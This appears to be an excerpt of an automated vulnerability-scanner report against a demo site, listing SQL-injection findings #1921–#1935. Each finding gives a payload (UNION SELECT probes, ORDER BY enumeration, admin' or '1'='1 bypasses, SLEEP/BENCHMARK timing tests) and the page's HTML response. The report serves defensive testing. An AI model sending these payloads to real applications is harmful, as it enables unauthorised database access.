href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1921\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1922\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1923\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1924\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1925\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1926Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1927\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1928\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1929\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1930\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1931\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1932\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1933\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1934\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ') or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1935\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ 